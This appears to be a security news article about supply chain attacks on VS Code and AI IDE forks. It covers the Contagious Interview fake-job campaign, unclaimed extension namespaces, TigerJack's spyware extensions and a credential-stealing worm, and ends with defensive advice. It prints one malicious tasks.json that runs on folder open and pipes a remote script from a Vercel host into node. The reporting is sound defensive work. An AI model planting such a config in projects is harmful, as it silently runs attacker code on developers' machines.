By ByteBot
Visual Studio Code faces a critical supply chain security crisis in early 2026. Three major attack vectors have converged: North Korean hackers’ “Contagious Interview” campaign exploiting fake job interviews to deliver backdoor malware, a vulnerability in AI-powered IDE forks (Cursor, Windsurf, Google Antigravity, Trae) where hardcoded “recommended extensions” pointed to unclaimed namespaces that attackers registered, and TigerJack’s 11 malicious extensions that infected 17,000+ developers with spyware, crypto miners, and remote backdoors. Microsoft removed 110 malicious extensions in 2025 alone, yet attacks persist—with TigerJack’s extensions still active on OpenVSX months after removal.
VS Code isn’t just popular—it’s a monoculture. With 73.71% developer adoption, a successful attack on the ecosystem affects most of the industry. These aren’t isolated incidents. They represent a fundamental shift: sophisticated nation-state actors and cybercriminals are compromising developer tools themselves, gaining access to source code, credentials, and corporate networks. Gartner predicts 60% of organizations will experience a software supply chain attack by 2026, up from 15% in 2021.
North Korean Hackers Weaponize Fake Job Interviews
Jamf Threat Labs uncovered the “Contagious Interview” campaign actively running in January 2026. North Korean APT groups contact developers with fake technical interviews and coding assessments, sending malicious Git repositories hosted on GitHub or GitLab. When developers open these repos in VS Code and grant “workspace trust,” malicious tasks.json files auto-execute commands that download JavaScript payloads from Vercel-hosted infrastructure, establishing persistent backdoors with C2 communication every 5 seconds.
Here’s what the attack looks like in practice:
{
"version": "2.0.0",
"tasks": [
{
"label": "Setup Development Environment",
"type": "shell",
"command": "nohup bash -c 'curl -s https://edgeauth.vercel.app/payload.js | node -' &",
"runOptions": {
"runOn": "folderOpen"
}
}
]
}The payload enables remote JavaScript execution, system fingerprinting (hostname, MAC addresses, OS details), and maintains persistent access. Jamf notes that “the application automatically processes the repository’s tasks.json configuration file, which can result in embedded arbitrary commands being executed on the system.” Researchers observed inline comments suggesting AI-assisted code generation—nation-states are using AI to build better malware.
This exploits a dangerous combination: social engineering (trusted recruitment process) and VS Code’s auto-execution trust model. Developers habitually click “yes, I trust” without reviewing what will execute. The targets aren’t random—defense contractors, AI/ML companies, and crypto firms are specifically being hunted.
AI IDE Forks Had Critical Supply Chain Flaw
The irony is palpable: tools designed to boost developer productivity are creating new attack vectors faster than security teams can respond. Koi Security discovered in late 2025 that AI-powered IDE forks (Cursor, Windsurf, Google Antigravity, Trae) inherited VS Code’s “recommended extensions” lists but pointed to unclaimed namespaces in the OpenVSX registry. Threat actors could register these namespaces and upload malicious extensions that would appear as official recommendations within the IDEs.
The vulnerability chain was straightforward: IDE fork recommends “publisher-name.extension-id” → OpenVSX namespace “publisher-name” is unclaimed → Attacker registers namespace → Uploads malicious extension → Users trust “recommended” tag → Infected. Once installed, malicious extensions gained full privileges: file access, environment variables, cloud credentials.
After disclosure, maintainers removed vulnerable recommendations and uploaded placeholder extensions to block the namespaces. No evidence of active exploitation emerged before fixes were applied, but the vulnerability exposed what Koi Security calls “gaps in supply chain security, registry governance, and extension validation.” Enterprises rapidly adopted Cursor and Windsurf for AI-assisted coding without realizing these forks inherited VS Code’s trust model but added new vulnerabilities. The AI IDE adoption rush outpaced security considerations.
Related: IDEsaster: 30+ Flaws Expose AI Coding Tools to Data Theft
TigerJack’s 17,000+ Infections Still Active
A threat actor known as TigerJack (aliases: ab-498, 498, 498-00) published 11 malicious VS Code extensions disguised as productivity tools. The two most successful—”C++ Playground” and “HTTP Format”—infected over 17,000 developers before Microsoft removed them. The catch? These extensions remain fully operational on OpenVSX, the registry used by Cursor, Windsurf, and other forks. Microsoft cleaned house. OpenVSX didn’t. Guess which marketplace AI-powered IDEs use?
“C++ Playground” auto-activates on VS Code launch, monitors every keystroke in C++ files, and uploads code in real-time after a delay. “HTTP Format” secretly mines cryptocurrency using embedded CoinIMP credentials. Both establish remote backdoors that check for commands every 20 minutes, allowing TigerJack to dynamically push new payloads without updating the extension—credentials and API keys stolen, ransomware deployed, corporate networks infiltrated, backdoors injected into projects.
Security researchers note that “the malware operates invisibly, delivering exactly the functionality it promises while simultaneously stealing intellectual property, hijacking system resources, and maintaining a persistent backdoor for remote access.” Developers couldn’t detect it because extensions delivered promised functionality. On September 17, 2025, TigerJack launched a coordinated re-publication campaign, publishing five extensions simultaneously under the new alias “498-00″—including “cppplayground,” which repackaged the same malicious code.
Microsoft’s Security Controls Are Failing
Microsoft’s multi-layered security approach sounds impressive: antivirus scanning with Microsoft Defender, sandboxed testing in clean room VMs, automatic secret detection. The reality? 110 malicious extensions were removed in 2025 (from 136 reviewed). Microsoft calls this “preventing potential damage.” Security researchers call it proof that current controls are failing.
Analysis of 52,880 third-party extensions revealed 5.6% exhibit suspicious behavior. Over 550 leaked access tokens were found across 500+ extensions from hundreds of publishers. A leaked VS Code Marketplace token can distribute malware to 150,000 users instantly. Microsoft acknowledges that “current security controls aren’t enough to catch malicious extensions, as sandbox analysis and antivirus checks can be bypassed with simple evasion techniques.”
In October 2025, a self-propagating worm compromised extensions that harvested NPM, GitHub, and Git credentials, then used stolen tokens to publish infected updates to other extensions—35,000+ downloads, 7 OpenVSX extensions compromised before detection. Fourteen extensions directly access SSH private keys or cloud access tokens via file paths. The trust model is broken. Developers assume marketplace vetting is sufficient—it’s not.
What Developers and Organizations Must Do Now
Developers are the new high-value targets for nation-states and cybercriminals. Compromising one developer machine provides access to source code, production credentials, and entire corporate networks. The AI IDE gold rush is real, but developers who adopt Cursor and Windsurf without security review aren’t pioneers—they’re guinea pigs.
Never grant workspace trust without reviewing tasks.json and .vscode configs. Verify extension publishers: check download counts, reviews, update history, and source code if available. Limit installed extensions and disable auto-updates to prevent worm propagation. Avoid opening repositories from unknown sources, especially recruiters or job interviews. Use the official VS Code Marketplace when possible—it has higher review rigor than OpenVSX.
Organizations need centralized extension inventories to respond quickly when malicious extensions are reported. Implement allowlists of pre-approved extensions and block unapproved installs. Monitor privileged developer workstations, especially those with cloud or production access. Disable workspace auto-execution unless required, and apply Zero Trust segmentation restricting extension process access to sensitive resources. Prepare incident response plans for developer tool compromise scenarios.
Key Takeaways:
- Three major attack vectors (Contagious Interview, IDE fork vulnerability, TigerJack malware) demonstrate that VS Code’s trust model is broken—Microsoft removed 110 malicious extensions in 2025, yet attacks persist
- AI IDE forks (Cursor, Windsurf) inherited VS Code’s ecosystem but added new vulnerabilities without security review—enterprises adopted them for productivity without realizing the risks
- Developers must verify extension publishers, review tasks.json before granting workspace trust, and avoid opening repositories from unknown sources (fake job interviews are active attack vectors)
- Organizations need centralized extension allowlists, disabled auto-updates, Zero Trust segmentation, and incident response plans—marketplace vetting alone is insufficient
- With 73.71% developer adoption and Gartner predicting 60% of organizations will face supply chain attacks by 2026, the AI IDE adoption rush must slow until security catches up
